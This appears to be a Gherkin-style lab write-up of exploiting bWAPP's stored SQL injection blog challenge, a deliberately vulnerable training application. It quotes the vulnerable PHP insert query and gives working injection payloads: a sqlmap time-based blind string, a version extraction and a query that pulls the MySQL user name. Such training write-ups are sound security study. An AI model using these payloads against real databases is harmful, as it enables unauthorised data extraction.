# language: en

Feature: SQL Injection Stored (Blog)
  From system bWAPP
  From the A1 - Injection Category
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  And I am running Sqlmap 1.1v
  Given the following
  """
  URL: http://localhost/bWAPP/sqli_7.php
  Message: SQL Injection Stored (Blog)
  Details:
        - Blog input text
        - Table with added entries
        - Add/Delete entries
  Objective: Make an Stored Sql injection
  """

Scenario: Stored Sql Injection
The Stored Sql Injection it's a reference to an insert query,
the output will be reflected on the table where the entries
can be seen.
  Given the blog, I add a new entry on it
  """
  # sqli_7.php
  <form action="/bWAPP/sqli_7.php" method="POST">
    <p><label for="entry">Add an entry to our blog:</label><br />
    <textarea name="entry" id="entry" cols="80" rows="3"></textarea></p>
    <button type="submit" name="blog" value="add">Add Entry</button>
  &nbsp;&nbsp;
  </form>

  # Burp Request
  POST /bWAPP/sqli_7.php HTTP/1.1
  Host: 192.168.56.101

  entry=new-entry&blog=add

  # Entry on table
  | 24 | bee |2018-07-24 08:42:00 | new-entry |
  """
  Then I take a look at the source code
  """
  # sqli_7.php
  68  $entry = htmli($_POST["entry"]);
  69  $owner = $_SESSION["login"];

  81  $sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),\
  '" . $entry . "','" . $owner . "')";
  82  $recordset = $link->query($sql);
  83  if(!$recordset)
  84  {
  85    die("Error: " . $link->error . "<br /><br />");
  86  }
  """
  And I see I need to inject a query on the $entry variable
  Then I start with sqlmap to speed it up
  """
  # Sqlmap output
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind
  Payload: entry='||(SELECT 'NPIP' FROM DUAL WHERE 4453=4453 AND\
  SLEEP(10))||'&blog=add
  """
  Then I pick up that result and use it as entry
  And on response it takes 10s
  But I need to get more information
  Then I try with another query
  """
  # Injection Query: 1',(SELECT version()))-- -
  """
  And at the table on response the value can be seen
  """
  # Table with query as the new entry
  | # |  Owner | Date | Entry |
  | 21 | 5.0.96-0ubuntu3 | 2018-07-24 | 06:22:28 | 1 |

  # Here we can see that the query worked, it's printing
  # the version used.
  """
  Then I try with another query
  """
  # Injection Query: 1' * CONV(HEX(SUBSTRING((SELECT user FROM mysql.user LIMIT
  1), 1, 8)), 16, 10) * '1
  """
  And this will store the following result
  """
  | # |  Owner | Date | Entry |
  | 22 | bee | 2018-07-24 | 06:24:14 | 1919905652 |

  # As the operation extracted a value and convert it to base 10 and later
  # on base 16, let's decode it and see what's the value
  # From base 10 to 16
  # 1919905652 => 726F6F74
  # From base 16 to ascii
  # root
  """
